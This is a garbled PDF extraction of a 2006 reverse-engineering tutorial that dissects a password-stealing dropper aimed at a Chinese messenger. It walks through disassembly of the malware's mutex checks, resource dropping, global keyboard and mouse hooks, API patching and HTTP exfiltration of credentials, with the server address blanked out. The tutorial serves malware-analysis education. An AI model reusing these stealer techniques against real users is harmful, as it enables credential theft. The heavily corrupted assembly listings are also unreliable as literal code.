anatomy of a malware

8/10/2019 Anatomy of a Malware

1/29

Anatomy of a MalwareNicolas FalliereJanuary 9, 2006IntroductionThis tutorial should help people understand how a simple piece of malware

works. I mighteventually go on with a series of papers that should help beginners in reverseengineering tocope with malicious programs.This first paper is about a password stealer. To start with something simple, it's adropperprogram written in C, packed with F!. The code is "uite clear andunderstandable. #anycommon techni"ues used by malware in general are used in this very program,which makesit an even more educative piece of malware to look at. For educational purposes,

most of theanalysis will consist of a white bo$ approach % in our case, meaning steppingthrough theprogram and analy&ing it with a disassembler.Characteristics of the file% #() hash fceea*d+-a)f))efc/be0df)abd1-/% i&e *1 bytes% Type 2-%bit 3indows 4ortable 5$ecutable 6457% 4acked yes% 8igh level language C, very likely9eader's re"uirements

% Intel $0 assembly% 3indows :4I, #(N nearbyThe original malwareFirst of all, let's have a general look at this file, using an he$adecimal editor suchas 8iew.Nothing particular there, it's a standard 45 file with - sections; the first one has aphysicalsi&e of + bytes. This is the sign of a packed file 6an empty section, which will befilled with thedata unpacked from another section7. The file contains no visible embeddede$ecutable.4eople used to reverse engineer malware will find the entry point "uitecharacteristicxchg esp,[0040D850]popadxchg esp,eaxpush ebp...


2/29

packer; its initials mean =Fast, mall, !ood=. I encourage you to download it onthe Internet,and try to pack a file with it, to check that the entry point is similar to the one ofour malware.This packer is easily bypassed the stub consists of the :plib library code that

decompressesthe e$ecutable in the first section. The I:T is resolved with a >oad>ibraryloop, ?ust before a ?ump to the original entry point.>et's see how to bypass that with oad>ibrary:@!et4roc:ddress, let's set abreakpoint onthis :4I. Aou can then go through this loop manually till the ?ump to the originalentry point, ordirectly set a breakpoint on the ?mp Beb$+cD in the middle of the loop, which ishow F!

gives the control back. This ?ump lands in another section % which is generally agood meansto find when a simple packer has done its ?obs, by the way.3e are now located at +$+1-(2, which is the entry point of the real program.>et's dump thedebugged e$ecutable from memory and analy&e it. The et'snot forget to check that the entry point of the dump is set on +$+1-(2. 3e nowhave a cleane$ecutable. The import name table is messed up, of course, but not enough todisturb the

analysis in I(:. 3e could eventually rebuild it partially with the free tool Imp9ec.The dump>et's have a look at that dump. : classic entry point 6push ebp @ mov ebp, esp7,three sections6two unnamed, one called =.newII(=7. 3e can also see that an e$ecutable file isembedded inthe dump, at file offset +$+++. 3e won't have a look at it now, but our first guessis that themain e$ecutable is a simple dropper. The real malware is probably inside thatfile. Nothingelse of interest here, e$cept some strings, some of them "uite uni"ue to identifythe malwareDLLFILE.newIID...RX_!"RERX_#$%EX&'()ewp*&'()ewp*&'()ewp*(!oo+.d


3/29

DF-e&'()ewp*(a/.exe&'()ewp*(!oo+.d!oo+a/...

1 2I)3"ccep' !%%6.0&onen7%*pe' app-ca-onx7www7o/97u/encoded:ass;:e/.DLL&'(/og/a9 F-es(%encen(??(&o/a??.exeaunche/.exeD=D @-ndowD=D @-ndow...

ome mute$ names, file paths, e$plicit names 6spy, hook...7, 8TT4 headers andE9> '!5T'parameters everything tells us we deal with an Infostealer. The referencemight indicatethis program's goal is to steal 's creadentials 6 is the largest messengingsystem in

China7. The strings are not encoded the ananalysis should be painless. : "uicklook at theimport table and :4I names also gives some nice hints about the inner workingof thisprogram... more on that later.White box analysis of the dump with IDAThe program starts withpub-c sa/00406>D= sa/ p/oc nea/00406>D= push ebp00406>D4 9o< ebp, esp

004012D6 push offset aRx_mutex ; "RX_MUTEX"004012DB push 0 ; bInhe!tan#$e004012DD push 1%0001h ; #&Des!e#'((ess004012E2 (a$$ )penMutex'00406>E8 es eax, eax00406>E" AnB sho/ oc_406>F6004012E* (a$$ #o_ma$!(!ous00406>F6


4/29

00406>F6 oc_406>F6'00406>F6 pop ebp00406>F> /en00406>F> sa/ endp

The program tries to open a mute$ named =9GH#ET5G=. If the call is successful,

theprogram terminates. This is a classic way % the easiest % to set a global marker ona system,to notify that the tro?an is already running. If the call to >E ca &/eaeD-/eco/*"00406>=4 push G dwF-e"/-bues00406>=G push ose sBD-/ &'(()ewp*

00406>=H ca eF-e"/-bues"00406>46 push ose a&)ewsp*!oo+_d &'(()ewp*((!oo+.d00406>4G push ose a!oo+ !oo+00406>4H push ose %*pe DF-e004012+0 (a$$ #op_#$$_fom_es00406>55 add esp, 0&h00406>58 9o< [ebp5H c9p [ebp5F AnB sho/ oc_406>G500406>G6 xo/ eax, eax

00406>G= A9p sho/ oc_406>&F00406>G5 777777777777777777777777777777777777777777777777777777777700406>G500406>G5 oc_406>G5'00406>G5 push 0 bFa-IEx-ss00406>GC push ose )ewF-e)a9e &'(()ewp*((a/.exe


5/29

00406>G& ca ge_9od_-ena9e00406>C6 push eax pEx-s-ngF-e)a9e00406>C> ca &op*F-e"004012,- push offset .!b%!$e/ame; "*/e&p3oo5#$$"

004012,D (a$$ .oa#.!ba3'00406>8= 9o< [ebph#odue], eax00406>8G c9p [ebph#odue], 000406>8" AnB sho/ oc_406>000406>8& xo/ eax, eax00406>8E A9p sho/ oc_406>&F00406>0 777777777777777777777777777777777777777777777777777777777700406>000406>0 oc_406>0'0040120 push offset s7ootat ; "ootat"004012+ mo8 eax9 :ebphMo#u$eo('##ess00406>F 9o< [ebpp!oo+a/], eax00406>"> c9p [ebpp!oo+a/], 000406>"G AnB sho/ oc_406>"&00406>"8 xo/ eax, eax00406>"" A9p sho/ oc_406>&F00406>"& 777777777777777777777777777777777777777777777777777777777700406>"&00406>"& oc_406>"&'

004012'* (a$$ map_memo3_aea004012B1 (a$$ :ebppootatH400406>H4 oc_406>H4'00406>H4 push 0 w#sgF-e/#ax00406>HG push 0 w#sgF-e/#-n00406>H8 push 0 h@nd00406>H" ea ecx, [ebp#sg]00406>HD push ecx p#sg00406>HE ca 3e#essage"00406>&4 es eax, eax

00406>&G AB sho/ oc_406>&"00406>&8 A9p sho/ oc_406>H400406>&" 777777777777777777777777777777777777777777777777777777777700406>&"00406>&" oc_406>&"'00406>&" 9o< eax, 600406>&F


6/29

00406>&F oc_406>&F'00406>&F 9o< esp, ebp00406>D6 pop ebp00406>D> /en00406>D> do_9a-c-ous endp

The directory CNewpy is created, and set to 8idden and ystem. Thefollowing call to'dropHdllHfromHres' is important. It will grab the 45 file we mentionned before,stored in theresource section, and will drop it on the disk. >et's check it out00406000 -n __cdec d/op_d_/o9_/esJL&%R p%*pe,L&%R p)a9e,L&%R pF-e)a9eK00406000 d/op_d_/o9_/es p/oc nea/0040600000406000 hResDaa ; dwo/d p/ 76&h00406000 hbAec ; dwo/d p/ 768h00406000 hResIno ; dwo/d p/ 764h00406000 n)u9be/H*es%o@/-e; dwo/d p/ 760h00406000 pHue/ ; dwo/d p/ 70&h00406000 )u9be/H*es@/-en; dwo/d p/ 7800406000 h#odue ; dwo/d p/ 7400406000 p%*pe ; dwo/d p/ 800406000 p)a9e ; dwo/d p/ 0&h00406000 pF-e)a9e ; dwo/d p/ 60h0040600000406000 push ebp00406006 9o< ebp, esp0040600= sub esp, 6&h

0040600G push 0 p#odue)a9e00406008 ca 3e#odue!ande"0040600E 9o< [ebph#odue], eax00406066 9o< eax, [ebpp%*pe]00406064 push eax p%*pe00406065 9o< ecx, [ebpp)a9e]00406068 push ecx p)a9e0040606 9o< edx, [ebph#odue]0040606& push edx h#odue0040101D (a$$ %!n#Resou(e'004060>= 9o< [ebphResIno], eax

004060>G c9p [ebphResIno], 0004060>" AnB sho/ oc_4060==004060>& xo/ eax, eax004060>E A9p oc_406600004060== 7777777777777777777777777777777777777777777777777777777777004060==004060== oc_4060=='


7/29

004060== 9o< eax, [ebphResIno]004060=G push eax hResIno004060=C 9o< ecx, [ebph#odue]004060=" push ecx h#odue004010?B (a$$ .oa#Resou(e

00406046 9o< [ebphResDaa], eax00406044 c9p [ebphResDaa], 000406048 AnB sho/ oc_4060560040604" xo/ eax, eax0040604& A9p oc_40660000406056 777777777777777777777777777777777777777777777777777777770040605600406056 oc_406056'00406056 9o< edx, [ebphResDaa]00406054 push edx hResDaa004010++ (a$$ .o(Resou(e0040605H 9o< [ebppHue/], eax0040605E c9p [ebppHue/], 0004060G> AnB sho/ oc_4060C5004060G4 9o< eax, [ebphResDaa]004060GC push eax hResDaa004060G8 ca F/eeResou/ce004060GE xo/ eax, eax004060C0 A9p oc_406600004060C5 7777777777777777777777777777777777777777777777777777777777004060C5

004060C5 oc_4060C5'004060C5 push 0 h%e9paeF-e004060CC push 80h dwFags"nd"/004060C& push > dw&/ea-onD-spo004060CE push 0 pecu/-*"/00406080 push > dwha/e#ode0040608> push 40000000h dwDes-/ed"ccess0040608C 9o< ecx, [ebppF-e)a9e]0040608" push ecx pF-e)a9e004010-B (a$$ *eate%!$e'0040606 9o< [ebphbAec], eax

0040604 c9p [ebphbAec], 0FFFFFFFFh0040608 AnB sho/ oc_4060"8004060" 9o< edx, [ebphResDaa]004060D push edx hResDaa004060E ca F/eeResou/ce004060"4 xo/ eax, eax004060"G A9p sho/ oc_406600


8/29

004060"8 7777777777777777777777777777777777777777777777777777777777004060"8004060"8 oc_4060"8'004060"8 9o< eax, [ebphResIno]

004060"H push eax hResIno004060"& 9o< ecx, [ebph#odue]004060"F push ecx h#odue004010B0 (a$$ !7eofResou(e004060HG 9o< [ebpn)u9be/H*es%o@/-e], eax004060H push 0 p push eax n)u9be/H*es%o@/004060&= 9o< ecx, [ebppHue/]004060&G push ecx pHue/004060&C 9o< edx, [ebphbAec]004060&" push edx hF-e004010*B (a$$ @!te%!$e004060D6 9o< eax, [ebp)u9be/H*es@/-en]004060D4 c9p eax, [ebpn)u9be/H*es%o@/-e]004060DC AB sho/ oc_4060EC004060D 9o< ecx, [ebphResDaa]004060D& push ecx hResDaa004060DD ca F/eeResou/ce004060E= xo/ eax, eax004060E5 A9p sho/ oc_406600

004060EC 7777777777777777777777777777777777777777777777777777777777004060EC004060EC oc_4060EC'004060EC 9o< edx, [ebphbAec]004060E" push edx hbAec004010EB (a$$ *$osean#$e004060F6 9o< eax, [ebphResDaa]004060F4 push eax hResDaa004010%+ (a$$ %eeResou(e004060FH 9o< eax, 6

0040660000406600 oc_406600'00406600 9o< esp, ebp0040660> pop ebp0040660= /en0040660= d/op_d_/o9_/es endp

This function uses the J9esource :4I functions e$ported by kernel2- to e$tract aresource.


9/29

The series of calls to do it is% Find9esource, takes a pointer to the 45 file, as well as a resource name andtype. It returnsa handle on that resource.% This handle is used by >oad9esource, which in turn returns a handle to a glabal

memoryblock% 4ass this handle to >ock9esource to get a valid memory pointer to the resourcedata% i&e> file is dropped. >et's go back to the caller, doHmalicious67.The e$ecutable file % the main program % is copied to CNewpytart.e$e. Thedropped (>>is loaded in the address space of our program, and a pointer to an e$ported entryis retrievedwith !et4roc:ddress 8ooktart. This pointer is stored in a local variable, and iscalled laterin +$+1-K1.#eanwhile, let's check out this call to mapHmemoryHarea67004066H& 9ap_9e9o/*_a/ea p/oc nea/004066H&004066H& hF-e#app-ngbAec; dwo/d p/ 74004066H&004066H& push ebp004066HD 9o< ebp, esp004066HF push ecx004011*0 push offset /ame ; "RX_'RE"004011*+ push 0'4h ; #&Max!mum!7e.o&004011*' push 0 ; #&Max!mum!7e!Ah004011** push 4 ; f$>ote(t004011*E push 0 ; $p%!$eMapp!nA'tt004011D0 push 0%%%%%%%%h ; h%!$e004011D2 (a$$ *eate%!$eMapp!nA'

004066D8 9o< [ebphF-e#app-ngbAec], eax004066DH c9p [ebphF-e#app-ngbAec], 0004066DF AB sho/ oc_406>60004066E6 push 0 dw)bH*es%o#ap004066E= push 0 dwF-eseLow004066E5 push 0 dwF-ese!-gh004066EC push > dwDes-/ed"ccess004066E 9o< eax, [ebphF-e#app-ngbAec]


10/29

004066E& push eax hF-e#app-ngbAec004011ED (a$$ Map!e&)f%!$e004066F= 9o< pHase"dd/ess, eax004066F8 c9p pHase"dd/ess, 0004066FF AB sho/ oc_406>60

00406>06 9o< ecx, pHase"dd/ess00406>0C push ecx pHue/0040120- (a$$ (op3_$ast_a4_b3tes_to_map00406>0D add esp, 400406>6000406>60 oc_406>60'00406>60 9o< edx, pHase"dd/ess00406>6G push edx pHase"dd/ess0040121, (a$$ Unmap!e&)f%!$e00406>6D 9o< esp, ebp00406>6F pop ebp00406>>0 /en00406>>0 9ap_9e9o/*_a/ea endpThis is a short function, that creates a file mapping. : file mapping is a memoryregion thatcan be backed up by a file, and can be accessed globally by processes on thesystem, byusing its name. It's a nice way to share memory between two processes.% In this case, no real file is used CreateFile#apping is called with its firstargument, the filehandle, set to %1. : blank memory area will be created.% : pointer to that memory block is retrieved by calling #apLiew


11/29

0040665H push 6 dwha/e#ode0040665D push 80000000h dwDes-/ed"ccess004066G> ca ge_9od_-ena9e004066GC push eax pF-e)a9e004066G8 ca &/eaeF-e"

004066GE 9o< [ebphbAec], eax004066C6 c9p [ebphbAec], 0FFFFFFFFh004066C5 AB sho/ oc_4066"E004011,, push 2 ; #&Mo8eMetho#004011, push 0 ; $pD!stToMo8e!Ah004011,B push 0%%%%%%+*h ; $D!stan(eToMo8e004011-0 mo8 eax9 :ebph)bCe(to!nte0040668" push 0 p ca &ose!ande004066H8 9o< esp, ebp004066H" pop ebp004066HH /en004066HH -_sha/ed_9e9o/* endp

This function simply copies the last +$: bytes of the file to the memory block.The first(3


12/29

"ueue to receive 3indows messages from the system, such as3#H#> doesn't do anything.Theconstant 1 is in fact (>>H49> will doits ?obs only

when it's attached to a process, not when a thread gets created.The file name of the e$ecutable module within which the (>> e$ecutes isretrived, andcompared to 'Client.e$e' and '5$plorer.e$e'. If it's neither the case, the (ll#ainterminates.1) A program called 'Explorer.exe' loads this !!If the 9GH#ET5G is opened successfully, (ll#ain terminates. That would meanthis (>>contains all it needs to e$ecute its malicious deeds.If the mute$ does not e$ist, a thread is created 6the entry point is the procedure Icalled

threadHmain, which we'll check out later7.2) A program called '"lient.exe' loads this !!The shared memory map, named 9GH8:95(, is retrieved. : pointer to thatblock is storedin a global variable.

:nother call, "uite important, is made in +$1+++-0C. This call checks out some fileslocated in the 4rogram Files folder.9emember, in our case, the (>> has been loaded by an e$ecutable, probablynamedClient.e$e, the original name of that e$ecutable. If the program name is neither ofthose,(ll#ain will not perform anything.8ooktart was called. >et's have a look at that procedurepub-c !oo+a/6000>C=8 !oo+a/ p/oc nea/6000>C=8 push ebp6000>C= 9o< ebp, esp6000>C=H c9p b#ouse!oo+, 06000>C4> AnB sho/ oc_6000>C5E


13/29

6000>C44 push 0 dw%h/eadId6000>C4G 9o< eax, h#odue6000>C4H push eax h9od10002,4* push offset &!nhoo_mouse_(a$$ba( ; $pfn10002,+1 push @_M)UE ; !#oo

10002,+? (a$$ #set@!n#o&sooEx'6000>C5 9o< b#ouse!oo+, eax6000>C5E6000>C5E oc_6000>C5E' &DE XREF'!oo+a/"6000>C5E c9p b2b!oo+, 06000>CG5 AnB sho/ oc_6000>C8>6000>CGC push 0 dw%h/eadId6000>CG 9o< ecx, h#odue6000>CGF push ecx h9od10002,,0 push offset &!nhoo_b_(a$$ba( ; $pfn10002,,+ push @_EB)'RD ; !#oo10002,,, (a$$ #set@!n#o&sooEx'6000>CCD 9o< b2b!oo+, eax6000>C8>6000>C8> oc_6000>C8>'6000>C8> pop ebp6000>C8= /en6000>C8= !oo+a/ endp6000>C8=

:nother classic procedure we find in ** of information stealer programs. Thisproceduresets two 3indows%message hooks. These global hooks tell 3indows to pass

certain3indows messages to a user%defined hook procedure instead of the realrecipient of themessage. The hook procedure is then responsible for relaying that message tothe recipient %or not.8ere, two hooks are set up a mouse hook, and keyboard hook. Check theconstants / and -on the et3indows8ook5$'s #(N page.The callback hook procedures are "uite short. 8ere is the mouse's one6000>GC8 LRE$L% __sdca w-nhoo+_9ouse_cabac+

J-n,@"R"#,L"R"#K6000>GC8 w-nhoo+_9ouse_cabac+ p/oc nea/6000>GC86000>GC8 n&ode ; dwo/d p/ 86000>GC8 wa/a9 ; dwo/d p/ 0&h6000>GC8 a/a9 ; dwo/d p/ 60h6000>GC86000>GC8 push ebp


14/29

6000>GC 9o< ebp, esp6000>GCH c9p [ebpwa/a9], @#_LH$%%)D@)6000>G8> AB sho/ oc_6000>GG6000>G84 c9p [ebpwa/a9], @#_RH$%%)D@)6000>G8H AB sho/ oc_6000>GG

6000>G8D c9p [ebpwa/a9], @#_LH$%%)DHL&L26000>G4 AnB sho/ oc_6000>G&=6000>GG6000>GG oc_6000>GG'6000>GG c9p dwo/d_600044>8, 06000>GD AB sho/ oc_6000>G&=6000>GF c9p dwo/d_600044>&, 06000>G"G AnB sho/ oc_6000>G&=6000>G"8 push 0 p@-ndow)a9e100026'' push offset *$ass/ame ; "D?D"100026'% (a$$ #s%!n#@!n#o&'6000>GH5 es eax, eax6000>GHC AB sho/ oc_6000>G&=100026B (a$$ po(ess_hooe#_messaAe6000>GHE 9o< dwo/d_600044>&, eax6000>G&=6000>G&= oc_6000>G&='6000>G&= 9o< eax, [ebpa/a9]6000>G&G push eax a/a96000>G&C 9o< ecx, [ebpwa/a9]6000>G&" push ecx wa/a96000>G&H 9o< edx, [ebpn&ode]6000>G&E push edx n&ode

6000>G&F 9o< eax, b#ouse!oo+6000>GD4 push eax hh+6000>GD5 ca ds'&a)ex!oo+Ex6000>GDH pop ebp6000>GD& /en 0&h6000>GD& w-nhoo+_9ouse_cabac+ endp

If the message being hooked matches a left@right button getting pressed or a leftdouble%click,the function cheks that a 3indow whose class is named '(2(' e$ists. #anyprograms mayhave 3indow classes with such a name. Finding what the program wants to

intercept heremight be difficult. :nyway, the thing to understand is how the malware works itsets globalmessage hooks, and filters the messages it receives by checking if a particularwindowe$ists. The core of the malicious action that will take place if the criteria arematched, in


15/29

processHhookedHmessage67. This function is also called bywinhookHkbHcallback67.Back to DllMain>et's go back to (ll#ain. 3e'll have a very "uick look at messHwithH""67, which iscalled

when the (>> runs in Client.e$e.This function modifies some binaries of Coral, which is an alternate version touse the messenging system 6Coral is to what a#N is to #N for instance7. Themain binaryis located by default to C4rogram FilesTencentCoral.e$e, which is thelocation themalware uses. Ky the way, using hard%coded path names is usually a bad idea,as programscould be installed anywhere on the system. #ost malware now use 3indows :4Isuch as

!etystem(irectory, or e$plore standard registry keys used by programs to storetheirlocation on the filesystem.Coral is modified to automatically load the malicious (>> when it's run by theuser. Thismethod avoids the user to insert a load point in the 9egistry for instance, andmonitorprograms to in?ect the (>> when an instance of Coral is detected.3e'll eventually analy&e file infectors specifically in a future paper.The (ll#ain still references a function we haven't e$amined yet threadHmain67.This function

is actually the entry point of a new thread. >et's see what it does6000>C84 D@RD __sdca h/ead_9a-nJLMIDK6000>C84 h/ead_9a-n p/oc nea/6000>C846000>C84 L-bF-e)a9e ; b*e p/ 76>0h6000>C84 #sg ; ag#3 p/ 76&h6000>C846000>C84 push ebp6000>C85 9o< ebp, esp6000>C8C sub esp, 6>0h10002,-D push offset aRx_mutex ; "RX_MUTEX"10002,2 push 0 ; bIn!t!a$)&ne

10002,4 push 0 ; $pMutex'tt!butes10002,6 (a$$ #s*eateMutex'6000>C& push 604h n-Be6000>C"6 ea eax, [ebpL-bF-e)a9e]6000>C"C push eax pF-ena9e6000>C"8 9o< ecx, h#odue6000>C"E push ecx h#odue6000>C"F ca ds'3e#odueF-e)a9e"


16/29

6000>CH5 9o< [ebpeaxL-bF-e)a9e], 06000>CHD ea edx, [ebpL-bF-e)a9e]6000>C&= push edx pL-bF-e)a9e6000>C&4 ca ds'LoadL-b/a/*"6000>C&" es eax, eax

6000>C&& AnB sho/ oc_6000>CD>6000>C&E xo/ eax, eax6000>CD0 A9p sho/ oc_6000>8646000>CD> 77777777777777777777777777777777777777777777777777777777776000>CD>6000>CD> oc_6000>CD>'6000>CD> ca !oo+a/6000>CDC ca ge_sha/ed_9ap_/o9_exe6000>CD& c9p pha/ed#ap, 06000>CE= AB sho/ oc_6000>CF10002,E+ push 0 ; $>aam10002,E, push 0 ; &>aam10002,E push @M_FUIT ; MsA10002,EB mo8 eax9 phae#Map10002,%0 mo8 e(x9 :eaxostThea#MessaAe'6000>CF6000>CF oc_6000>CF'6000>CF h/ead_9a-n86000>CF push 0 w#sgF-e/#ax6000>CFH push 0 w#sgF-e/#-n

6000>CFD push 0 h@nd6000>CFF ea edx, [ebp#sg]6000>80> push edx p#sg6000>80= ca ds'3e#essage"6000>80 es eax, eax6000>80H AB sho/ oc_6000>80F6000>80D A9p sho/ oc_6000>CF6000>80F 77777777777777777777777777777777777777777777777777777777776000>80F6000>80F oc_6000>80F'

6000>80F 9o< eax, 66000>8646000>864 oc_6000>864'6000>864 9o< esp, ebp6000>86G pop ebp6000>86C /en 46000>86C h/ead_9a-n endp


17/29

This function does not present any kind of difficulty. 8owever, we can nowe$plain where the3indows message e$pected by the initial program could come from. Keforereturning, theprocedure checks the shared map, gets the TI( stored in it, which is the thread

I( of theuni"ue thread of the main program, and sends its 3indows message loop a3#HEITmessage. !et#essage67 will process it, and the thread will terminate properly.This messagee$change is a non%classic way to achieve process synchroni&ation. In fact, thesharedmemory contains vital information for the malware. If the main program closes,and is the onlyone to have a handle to it, this handle will be closed and the shared mapdestroyed % handle

count falling to +. If another program opens the shared map, such as a programwhich wouldload this (>>, then it will not get destroyed when the main program terminates.The hooking system3hen a 3indows message is hooked successfully, the hook procedure calls thevery shortroutine processHhookedHmessage676000>0>4 p/ocess_hoo+ed_9essage p/oc nea/6000>0>4 push ebp6000>0>5 9o< ebp, esp1000202, (a$$ !nC_To's(!!1000202* (a$$ !nC_en#MessaAe100020?1 (a$$ !nC_FF_out!ne100020?6 (a$$ f!n#_spe(!a$_asm_!nsn_!n_exe6000>0=H 9o< eax, 66000>040 pop ebp6000>046 /en6000>046 p/ocess_hoo+ed_9essage endp

It calls several procedures used to hook a Coral routine and two 3indows:4Is, To:sciiand end#essage:. The way it hooks the two :4Is is classic their entry pointpoint is saved,then modified to call a hook procedure located in the (>>. 9ememenber that

has beenmodified, and that the (>> is running in the address space of 's e$ecutable.8ere's ane$ample with To:scii60006D8" -nA_%o"sc-- p/oc nea/60006D8" push ebp60006D8H 9o< ebp, esp60006D8D push ose /oc)a9e %o"sc--


18/29

60006D> push ose #odue)a9e $ER=>.DLL60006DC ca ds'3e#odue!ande"60006DD push eax h#odue60006DE ca ds'3e/oc"dd/ess60006D"4 9o< _%o"sc--, eax

60006D" push C s-Be60006D"H 9o< eax, _%o"sc--60006DH0 push eax add/_s/c60006DH6 push ose o/-g_%o"sc--_Cb add/_ds60006DHG ca 9e9cop*60006DHH add esp, 0&h60006DHE 9o< dwo/d_6000404D, ose hoo+_%o"sc--60006D&8 push C s-Be60006D&" push ose 9od_%o"sc--_Cb add/_s/c60006D&F 9o< ecx, _%o"sc--60006DD5 push ecx add/_ds60006DDG ca 9e9cop*60006DDH add esp, 0&h60006DDE pop ebp60006DDF /en60006DDF -nA_%o"sc-- endp

To:scii is used to translate a pressed key to an :CII character. Though thatmay seempointless to 359TA keyboards' users with :CII%only keys, don't forget that is achinese messenging system. This routine may be called by to translate somechinesecharacters before sending them on the network.

The hook procedure, hookHTo:scii67, first calls the original To:scii :4I % by usingthe originalentry point, previously saved % and copies the character to a buffer that will beused by thehook procedure of end#essage.That's not the most interesting part of the program, since we don't know the innerworking ofCoral.e$e. 3e can imagine that the creator of that malware analy&ed it todetermine whatcode flow the user name and password strings are following, and set hooks atkey points in

the program. >et's have a look at in?HHroutine6760006E&H -nA_??_/ou-ne p/oc nea/60006E&H60006E&H add/_-nsn ; dwo/d p/ 7860006E&H bue/ ; dwo/d p/ 7460006E&H60006E&H push ebp60006E&& 9o< ebp, esp


19/29

60006E&E sub esp, 860006ED6 push 0"h s-Be60006ED= push ose daa_9o& push ose un+_600040C4 add/_s/c60006F=6 9o< edx, [ebpadd/_-nsn]60006F=4 push edx add/_ds

60006F=5 ca 9e9cop*60006F=" add esp, 0&h60006F=D 9o< esp, ebp60006F=F pop ebp60006F40 /en60006F40 -nA_??_/ou-ne endp

The thing to see here is that a hook procedure, hookH""Hfunc67, will be calledwhen aparticular function of gets called. This function in is found by looking for aspecificopcode se"uence, located at the data reference dataHmovHec$eb$HmovHesi,

though this isnot important. hookH""Hfunc67 performs some string operations, and then callssetHtimer67, at+$1+++1(+2. Now that's interesting, and once again, a classic malwaretechni"ue used bypassword%stealer programs.60006"85 se_-9e/ p/oc nea/60006"85 push ebp


20/29

60006"8G 9o< ebp, esp60006"88 c9p uIDE


21/29

60006C5 ca s/ca60006C" add esp, 860006CD push ose NN_use/ cha/ 600068> ea edx, [ebpu/_pa/a9ee/s]6000688 push edx cha/

600068 ca bu-d_u/600068E add esp, 8100011 push offset a>ass ; ">assH"60006G ea eax, [ebpu/_pa/a9ee/s]60006& push eax cha/ 60006D ca s/ca60006"> add esp, 860006"5 push ose NN_pass cha/ 60006"" ea ecx, [ebpu/_pa/a9ee/s]60006H0 push ecx cha/ 60006H6 ca bu-d_u/60006HG add esp, 810001B push offset ae8 ; "e8H"60006HE ea edx, [ebpu/_pa/a9ee/s]60006&4 push edx cha/ 60006&5 ca s/ca60006&" add esp, 860006&D push ose NN_se/ ea eax, [ebpu/_pa/a9ee/s]60006D8 push eax cha/ 60006D ca bu-d_u/60006DE add esp, 810001E1 push offset aRo$e ; "Ro$eH"

60006EG ea ecx, [ebpu/_pa/a9ee/s]60006E& push ecx cha/ 60006ED ca s/ca60006F> add esp, 860006F5 push ose NN_/oe cha/ 60006F" ea edx, [ebpu/_pa/a9ee/s]60006"00 push edx cha/ 60006"06 ca bu-d_u/60006"0G add esp, 810001'0 push offset aE#!t ; "E#!tH"60006"0E ea eax, [ebpu/_pa/a9ee/s]

60006"64 push eax cha/ 60006"65 ca s/ca60006"6" add esp, 860006"6D push ose NN_ed- cha/ 60006">> ea ecx, [ebpu/_pa/a9ee/s]60006">8 push ecx cha/ 60006"> ca bu-d_u/60006">E add esp, 8


22/29

60006"=6 ea edx, [ebpu/_pa/a9ee/s]60006"=C push edx cha/ 60006"=8 ca s/en60006"=D add esp, 460006"40 push eax dwp-onaLengh

60006"46 ea eax, [ebpu/_pa/a9ee/s]60006"4C push eax pp-ona10001'4- mo8 e(x9 phae#Map10001'4E a## e(x9 +4h10001'+1 push e(x ; #ata10001'+2 (a$$ #e(o#e_http_!nfo ex/acs so9e u/ pa/s /o9 sha/ed 9ap60006"5C add esp, 460006"5" push eax psBbAec)a9e10001'+B mo8 e#x9 phae#Map10001'61 a## e#x9 410001'64 push e#x ; #ata10001'6+ (a$$ #e(o#e_http_!nfo ex/acs se/


23/29

60006CD860006CD8 psB"ccep%*pes ; dwo/d p/ 764h60006CD8 E xo/ eax, eax


24/29

600068=0 A9p oc_600068&5600068=5 7777777777777777777777777777777777777777777777777777777777600068=5600068=5 oc_600068=5'

600068=5 9o< [ebppsB"ccep%*pes],ose a"ccep "ccep' 600068=& 9o< [ebp 9o< edx, [ebphReNues]600068"5 push edx hIne/ne


25/29

600068"G ca ds'Ine/ne&ose!ande600068"& 9o< eax, [ebph&onnec]600068"F push eax hIne/ne600068H0 ca ds'Ine/ne&ose!ande600068HG 9o< ecx, [ebphIne/ne]

600068H push ecx hIne/ne600068H" ca ds'Ine/ne&ose!ande600068&0 9o< eax, 6600068&5600068&5 oc_600068&5'600068&5 9o< esp, ebp600068&C pop ebp600068&8 /en600068&8 send_NN_-no_o_se/ =serverHname@ob?ectHname=!pendReNuesJhReNues, &onen7%*pe'..., 0x>F,op-ona, s-Be

Jop-onaKK%P send the re"uest!pIne/ne&ose!andeJ..K

%P close everything the proper wayoptional is the actual stolen data. Now the "uestion is, what are the server nameand thecomplete E9>M :ctually, we should have asked ourself this "uestion a couple ofhundredslines beforeO 9ememenber that every piece of data seem to be stored inplainte$t; moreover,everything led us to think that the information was sent back to the author via

8TT4. o howcome we didn't see any E9> or I4 address Mending the stolen data! yes but where">et's analy&e timerHfunc67 deeper. lp#s$er%er&ame and lps#(ect&ame are thefirst andsecond parameters given to sendH""HinfoHtoHserver67. Those string pointersseem to be


26/29

calculated by a function, decodeHhttpHinfo67, called twice in +$1+++1:)- and+$1+++1:).This function takes a single parameter, a pointer to our famous shared map 6thenamedob?ect =9GH8:95=7. :ctually, the first call is given a pointer to the shared map

+$), thesecond . It seems to make sense since the first (3 ... 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

>et's see what decodeHhttpHinfo does with it600068& -n __cdec decode_hp_-noJcha/ daaK600068& decode_hp_-no p/oc nea/600068&

600068& en ; dwo/d p/ 70&h600068& cp ; dwo/d p/ 78600068& bue/ ; dwo/d p/ 74600068& daa ; dwo/d p/ 8600068&600068& push ebp600068&" 9o< ebp, esp600068&& sub esp, 0&h600068&F push 50h s-Be_600068D6 ca 9aoc600068DG add esp, 4

600068D 9o< [ebpbue/], eax600068D& push 50h s-Be_600068DE push 0 -n600068E0 9o< eax, [ebpbue/]600068E= push eax


27/29

600068EF push ecx cha/ 600068F0 ca s/en600068F5 add esp, 4600068F8 9o< [ebpen], eax600068FH 9o< [ebpcp], 0

600060> A9p sho/ oc_600060D6000604 777777777777777777777777777777777777777777777777777777777760006046000604 oc_6000604'6000604 9o< edx, [ebpcp]600060C add edx, 6600060" 9o< [ebpcp], edx600060D600060D oc_600060D'600060D 9o< eax, [ebpcp]6000660 c9p eax, [ebpen]600066= Anb sho/ Qex-6000665 9o< ecx, [ebpdaa]6000668 add ecx, [ebpcp]100011B xo eax9 eax100011D mo8 a$9 :e(x

have beenblanked out on purpose7se/ is solved. The algorithm was "uite poor, but stillsufficient toprevent an analyst to get all pieces of information from a simple look at theprogram's data.5ven a black bo$ analysis, when running the program, would probably not havebeenenough. The conditions to actually get the infostealer to work are not trivial

% need to have the program with a proper name, as seen before 6client.e$e7% need a good version of Coral 6not even the official program7% need to actully establish a proper connection and monitor the traffic or log the

